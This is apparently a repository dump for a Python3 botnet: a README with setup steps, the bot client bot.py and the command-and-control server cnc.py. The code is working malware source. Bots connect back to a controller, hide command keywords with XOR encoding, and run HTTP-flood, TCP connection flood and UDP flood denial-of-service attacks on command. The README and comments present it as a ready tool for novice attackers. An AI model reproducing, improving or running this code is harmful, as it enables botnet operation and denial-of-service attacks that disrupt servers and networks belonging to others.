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1 | # Python3-Botnet  
2 |
3 | **Project moved to [here](https://github.com/Leeon123/Aoyama)**
4 |
5 | **Use Python3 to build a botnet (include bot and c&c)**
6 |
7 | **Xor encode traffic**
8 |
9 | **Qbot style Login.**
10 |
11 | Build up a easy P2P botnet with python3.
12 |
13 | ***Youtube Video: https://youtu.be/3_JnAXVtFNs (outdated)***
14 |
15 | I will upload xor version and new tut video as fast as i can :)
16 |
17 | ## C&C Features
18 |
19 | Using login.txt to check account.
20 |
21 | **TCP Keep-Alive Connection**
22 |
23 | **Simple CNC** with **Xor encode traffic**
24 | ## Bot Features
25 | **Xor encode traffic**
26 |
27 | **Three attack mode**
28 |
29 | - [x] Http-flood
30 | - [x] TCP Connection FLood
31 | - [x] UDP Flood
32 |
33 | **Keep-Alive connection**
34 | ## Requirement
35 | ***Only need python3 :)***
36 |
37 | ## Usage:
38 | ***Edit*** the cnc server ip and port into the bot.py **at first**.
39 |
40 | Then, edit the password of cnc.py and run the cnc.py:
41 |
42 | python3 cnc.py
43 |
44 | At Last, run the bot.py in any python3 environment(IDE, codeanywhere,etc.) then the **Bot** is online.
45 |
46 | ***To login cnc***, using **putty raw-mode** or telnet(**in linux**) to connect it then
47 |
48 | input worlds "Login" will show the login parameters
49 |
50 | Username:
51 | At this moment, u should create a text called login.txt and input the username and password in it
52 |
53 | Like this:
54 |
55 | Leeon123 test
56 |
57 | After that, Just input ur username and password.
58 |
59 |
60 | Username:Leeon123
61 | Password:test
62 |
63 | **Welcome to Python3 C&C Server.**
64 |
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/bot.py:
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1 | #!/usr/bin/env python3
2 | #Code By Leeon123
3 |
4 | #-- Python Bot version v2 --#
5 | # Added xor encode traffic #
6 | # Improved dos attack code #
7 | # New process lock desgin #
8 | # More easy for the skid #
9 | #############################
10 | import socket
11 | import sys
12 | import os
13 | import time
14 | import random
15 | import threading
16 | import base64 as b64
17 |
18 | cnc = str("127.0.0.1")#your cnc ip
19 | cport = int(81)#your cnc port
20 | key = "asdfghjkloiuytresxcvbnmliuytf"
21 | #xor key, don't edit it if u don't know wtf is this#
22 |
23 | useragents=["Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
24 | "Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
25 | "Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
26 | "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
27 | "Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
28 | "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
29 | "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
30 | "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
31 | "Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
32 | "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
33 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
34 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
35 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
36 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
37 | "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
38 | "Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
39 | "Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
40 | "Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
41 | "Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
42 | "Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",]
43 |
44 | acceptall = [
45 | "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
46 | "Accept-Encoding: gzip, deflate\r\n",
47 | "Accept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
48 | "Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: iso-8859-1\r\nAccept-Encoding: gzip\r\n",
49 | "Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",
50 | "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n",
51 | "Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*\r\nAccept-Language: en-US,en;q=0.5\r\n",
52 | "Accept: text/html, application/xhtml+xml, image/jxr, */*\r\nAccept-Encoding: gzip\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
53 | "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Encoding: gzip\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n,"
54 | "Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n",
55 | "Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
56 | "Accept: text/html, application/xhtml+xml",
57 | "Accept-Language: en-US,en;q=0.5\r\n",
58 | "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\n",
59 | "Accept: text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",]
60 |
61 | stop = False
62 | def HTTP(ip, port, path):
63 | global stop
64 | while True:
65 | if stop :
66 | break
67 | get_host = "GET "+path+"?"+str(random.randint(0,50000))+" HTTP/1.1\r\nHost: " + ip + "\r\n"
68 | connection = "Connection: Keep-Alive\r\n"
69 | useragent = "User-Agent: " + random.choice(useragents) + "\r\n"
70 | accept = random.choice(acceptall)
71 | http = get_host + useragent + accept + connection + "\r\n"
72 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
73 | try:
74 | s.connect((str(ip), int(port)))
75 | for y in range(100):
76 | s.send(str.encode(http))
77 | #s.close()
78 | except:
79 | s.close()
80 |
81 | def CC(ip, port):
82 | global stop
83 | while True:
84 | if stop :
85 | break
86 | try:
87 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
88 | s.connect((str(ip),int(port)))
89 | s.send("\000".encode())
90 | s.close()
91 | except:
92 | s.close()
93 |
94 | def UDP(ip, port, size):
95 | global stop
96 | while True:
97 | if stop :
98 | break
99 | udpbytes = random._urandom(int(size))
100 | sendip=(str(ip),int(port))
101 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
102 | try:
103 | for y in range(thread):
104 | s.sendto(udpbytes, sendip)
105 | s.close()
106 | except:
107 | s.close()
108 |
109 | def cmdHandle(sock):
110 | global stop
111 | attack = 0
112 | sock.send(xor_enc("1337",key).encode())#login code
113 | while True:
114 | tmp = sock.recv(1024).decode()
115 | if len(tmp) == 0:
116 | main()
117 | #print(tmp)
118 | data = xor_dec(tmp,key)
119 | if data[0] == '!':
120 | try:
121 | command = data.split()
122 | print(command)
123 | if command[0] == xor_dec('QBAH',key):#encoded keywords: !cc
124 | if attack != 0:
125 | stop = True
126 | attack=0
127 | stop = False
128 | for x in range(int(command[3])):
129 | p = threading.Thread(target=CC, args=(command[1],command[2]))
130 | p.start()
131 | attack+=1
132 | elif command[0] == xor_dec('QBsQEhc=',key):#encoded keywords: !http
133 | if attack != 0:
134 | stop = True
135 | attack=0
136 | stop = False
137 | for x in range(int(command[3])):
138 | p = threading.Thread(target=HTTP, args =(command[1],command[2],command[4]))
139 | p.start()
140 | attack+=1
141 | elif command[0] == xor_dec('QAYAFg==',key):#encoded keywords: !udp
142 | if attack != 0:
143 | stop = True
144 | attack=0
145 | stop = False
146 | for x in range(int(command[3])):
147 | p = threading.Thread(target=UDP, args =(command[1],command[2],command[4]))
148 | p.start()
149 | attack+=1
150 | elif command[0] == xor_dec('QAAQCRc=',key):
151 | stop = True
152 | attack = 0#clear attack list
153 | elif command[0] == xor_dec('QBgNCgs=',key):#!kill : kill bot
154 | sys.exit(1)
155 | except:
156 | pass
157 | if data == xor_dec("ERoKAQ==",key):#ping
158 | sock.send(xor_enc("pong",key).encode())#keepalive and check connection alive
159 |
160 | def main():
161 |
162 | try:
163 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
164 | s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
165 | s.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
166 | #s.setsockopt(socket.SOL_TCP, socket.TCP_KEEPIDLE, 10)
167 | #s.setsockopt(socket.SOL_TCP, socket.TCP_KEEPINTVL, 10)
168 | s.setsockopt(socket.SOL_TCP, socket.TCP_KEEPCNT, 3)#this only can use on python3 env, python2 pls off this
169 | s.connect((cnc,cport))
170 |
171 | cmdHandle(s)
172 |
173 | except Exception as e:
174 | connect()#magic loop
175 |
176 | def connect():
177 | time.sleep(5)
178 | main()
179 | #xor enc part#
180 | def xor_enc(string,key):
181 | lkey=len(key)
182 | secret=[]
183 | num=0
184 | for each in string:
185 | if num>=lkey:
186 | num=num%lkey
187 | secret.append( chr( ord(each)^ord(key[num]) ) )
188 | num+=1
189 |
190 | return b64.b64encode( "".join( secret ).encode() ).decode()
191 |
192 | def xor_dec(string,key):
193 |
194 | leter = b64.b64decode( string.encode() ).decode()
195 | lkey=len(key)
196 | string=[]
197 | num=0
198 | for each in leter:
199 | if num>=lkey:
200 | num=num%lkey
201 |
202 | string.append( chr( ord(each)^ord(key[num]) ) )
203 | num+=1
204 |
205 | return "".join( string )
206 |
207 |
208 | if __name__ == '__main__':
209 | main()
210 |
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/cnc.py:
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1 | #!/usr/bin/env python3
2 | # -*- coding: UTF-8 -*-
3 | #Code by LeeOn123
4 | #Updated at 15/7/2019
5 | #====================================================================#
6 | # ____ _ _ ____ _ _ #
7 | #| _ \ _ _| |_| |__ ___ _ __ | __ ) ___ | |_ _ __ ___| |_ #
8 | #| |_) | | | | __| '_ \ / _ \| '_ \ | _ \ / _ \| __| '_ \ / _ \ __|#
9 | #| __/| |_| | |_| | | | (_) | | | | | |_) | (_) | |_| | | | __/ |_ #
10 | #|_| \__, |\__|_| |_|\___/|_| |_| |____/ \___/ \__|_| |_|\___|\__|#
11 | # |___/ #
12 | #====================================================================#
13 | # ~ version 2.1 ~ #
14 | ######################################################################
15 | import socket
16 | import argparse
17 | import threading
18 | import os
19 | import time
20 | import sys
21 | from os import system, name
22 | import base64 as b64
23 |
24 | key= "asdfghjkloiuytresxcvbnmliuytf"#xor key
25 |
26 | if len(sys.argv)<=1:
27 | print("Usage: python3 cnc.py ")
28 | sys.exit()
29 |
30 | b = int(sys.argv[1])
31 |
32 | socketList = []
33 | def sendCmd(cmd):#Send Commands Module
34 | print('[*]Command sent!!!')#debug
35 | print(cmd)
36 | data = xor_enc(cmd,key)#encode
37 | for sock in socketList:
38 | try:
39 | sock.settimeout(1)
40 | sock.send(data.encode())
41 | except:
42 | socketList.remove(sock)#del error connection
43 | print("[!] A bot offline")
44 |
45 | def scan_device():#scan online device
46 | print('scanning Online bot')
47 | for sock in socketList:
48 | try:
49 | sock.settimeout(1)
50 | sock.send(xor_enc("ping",key).encode())#check connection
51 | except:
52 | socketList.remove(sock)#del error connection
53 | print("[!] A bot offline")#debug
54 |
55 | def showbot():#bot count
56 | while True:
57 | try:
58 | so.send(("\033]0;Nodes : "+str(len(socketList))+" \007").encode())
59 | time.sleep(1)
60 | except:
61 | return
62 |
63 | def handle_bot(sock,socketList):
64 | while True:
65 | try:
66 | sock.send(xor_enc("ping",key).encode())#keepalive and check connection
67 | print("ping")
68 | pong = sock.recv(1024).decode()
69 | if xor_dec(pong,key) == "pong":
70 | print("pong")
71 | time.sleep(60)#check connection every min
72 | except:
73 | try:
74 | sock.close()
75 | socketList.remove(sock)
76 | print("[!] A bot offline")
77 | except:#bug happened here, if not add "break" then there will be a "magic" loop
78 | pass
79 | break
80 |
81 | def waitConnect(sock,addr):
82 | passwd = sock.recv(1024).decode()
83 | try:
84 | passwd2 = xor_dec(passwd,key)
85 | if passwd2 == "1337" :
86 | if sock not in socketList:
87 | socketList.append(sock)
88 | print("[!] A bot Online "+ str(addr)) #message
89 | handle_bot(sock,socketList)
90 | else:
91 | sock.close()
92 | except:
93 | if passwd == "Login\r\n" or passwd == "Login":#login code
94 | #If u are using putty pls use raw mode to connect,
95 | #If connected, there will not show anything on screen
96 | #Just input 'Login' and enter.
97 | print("Somebody login...")
98 | Commander(sock)
99 | else:
100 | sock.close()
101 |
102 | def Commander(sock):#cnc server
103 | global so
104 | so = sock
105 | sock.send("Username:".encode())
106 | name = sock.recv(1024).decode()
107 | sock.send("Password:".encode())
108 | passwd = sock.recv(1024).decode()
109 | tmp = open("login.txt").readlines()#enter ur username and password in login.txt
110 | corret=0
111 | for x in tmp:
112 | tmp2 = x.split()
113 | #print(tmp2[0])#debug
114 | #print(tmp2[1])#
115 | if tmp2[0]+"\r\n" == name and tmp2[1]+"\r\n" == passwd:
116 | print("Commander here: "+tmp2[0])
117 | corret+=1
118 | if corret != 1:
119 | sock.close()
120 | return
121 | sock.send("Setting up the server\r\n".encode())#loading sense
122 | time.sleep(0.5)
123 | sock.send("\033[2J\033[1H".encode())
124 | sock.send("Setting up the server [-]\r\n".encode())
125 | time.sleep(0.3)
126 | sock.send("\033[2J\033[1H".encode())
127 | sock.send("Setting up the server [\\]\r\n".encode())
128 | time.sleep(0.3)
129 | sock.send("\033[2J\033[1H".encode())
130 | sock.send("Setting up the server [-]\r\n".encode())
131 | time.sleep(0.3)
132 | sock.send("\033[2J\033[1H".encode())
133 | sock.send("Setting up the server [/]\r\n".encode())
134 | time.sleep(0.3)
135 | sock.send("\033[2J\033[1H".encode())
136 | sock.send("Setting up the server [-]\r\n".encode())
137 | time.sleep(0.3)
138 | sock.send("\033[2J\033[1H".encode())
139 | sock.send("Setting up the server [\\]\r\n".encode())
140 | time.sleep(0.3)
141 | sock.send("\033[2J\033[1H".encode())
142 | sock.send("Setting up the server [-]\r\n".encode())
143 | time.sleep(0.3)
144 | sock.send("\033[2J\033[1H".encode())
145 | sock.send("Setting up the server [/]\r\n".encode())
146 | time.sleep(0.3)
147 | sock.send("\033[2J\033[1H".encode())
148 | sock.send("[!] Setting Up Connection Socket...\r\n".encode())
149 | time.sleep(0.5)
150 | sock.send("[!] Updating Server Config...\r\n".encode())
151 | time.sleep(0.5)
152 | sock.send("[!] Setting Up C&C Module...\r\n".encode())
153 | time.sleep(0.5)
154 | sock.send("[!] Done...\r\n".encode())
155 | time.sleep(0.5)
156 | sock.send("[!] Welcom to the Python3 C&C Server, glhf !!!\r\n".encode())
157 | sock.send("==============================================\r\n".encode())
158 | time.sleep(1)
159 | botn = threading.Thread(target=showbot)
160 | botn.start()
161 |
162 |
163 | while True:
164 | #print ("==> Python3 C&C server <==")
165 | sock.send('ルート@ボットネット:'.encode())#if u run this on windows, it may has some bug, idk why so,i use linux.
166 | cmd_str = sock.recv(1024).decode()
167 | if len(cmd_str):
168 | if cmd_str[0] == '!':
169 | sendCmd(cmd_str)
170 | if cmd_str[0] == 'scan':
171 | scan_device()
172 | if cmd_str == '?' or cmd_str == 'help' or cmd_str == '?\r\n' or cmd_str == 'help\r\n':
173 | sock.send('\r\n#-- Commands --#\r\n'.encode())
174 | sock.send(' CC Flood: !cc host port threads\r\n'.encode()) #tcp connection flood
175 | sock.send(' HTTP Flood: !http host port threads path\r\n'.encode()) #http flood
176 | sock.send(' UDP Flood: !udp host port threads size\r\n\r\n'.encode())#udp flood
177 | sock.send(' !stop : stop attack\r\n'.encode())
178 | sock.send(' !kill : kill all the bots\r\n'.encode())
179 | sock.send(' bots : count bot\r\n'.encode())
180 | sock.send(' scan : check online connection\r\n'.encode())#check connecton status, if some offline or timeout will delete them form bot list.
181 | sock.send(' clear : Clear screen\r\n'.encode())
182 | sock.send(' exit : exit the server\r\n'.encode())
183 | sock.send(' shutdown : shutdown the server\r\n'.encode())
184 | sock.send('=============================================================\r\n'.encode())
185 | if cmd_str == 'bots' or cmd_str == 'bots\r\n':
186 | sock.send(("Nodes:"+str(len(socketList))+"\r\n").encode())
187 | if cmd_str == 'clear' or cmd_str == 'clear\r\n':
188 | sock.send("\033[2J\033[1H".encode())
189 | if cmd_str == 'exit' or cmd_str == 'exit\r\n':
190 | sock.send('Bye, ルート\r\n'.encode())
191 | stop = True
192 | sock.close()
193 | break
194 | if cmd_str == 'shutdown' or cmd_str == 'shutdown\r\n':#shutdown function
195 | sock.send('Shutdown\r\n'.encode())
196 | stop = True
197 | sock.close()
198 | print("shutdown from remote command")
199 | sys.exit()
200 |
201 | def main():
202 | global s
203 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
204 | s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
205 | s.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)#Keepalive tcp connection
206 | s.bind(('0.0.0.0',b))
207 | s.listen(1024)
208 | while True:
209 | sock, addr = s.accept()
210 | th = threading.Thread(target=waitConnect,args=(sock,addr))
211 | th.start()
212 |
213 | def xor_enc(string,key):
214 | lkey=len(key)
215 | secret=[]
216 | num=0
217 | for each in string:
218 | if num>=lkey:
219 | num=num%lkey
220 | secret.append( chr( ord(each)^ord(key[num]) ) )
221 | num+=1
222 |
223 | return b64.b64encode( "".join( secret ).encode() ).decode()
224 |
225 | def xor_dec(string,key):
226 | leter = b64.b64decode( string.encode() ).decode()
227 | lkey=len(key)
228 | string=[]
229 | num=0
230 | for each in leter:
231 | if num>=lkey:
232 | num=num%lkey
233 |
234 | string.append( chr( ord(each)^ord(key[num]) ) )
235 | num+=1
236 |
237 | return "".join( string )
238 |
239 | if __name__ == '__main__':
240 | main()
241 |
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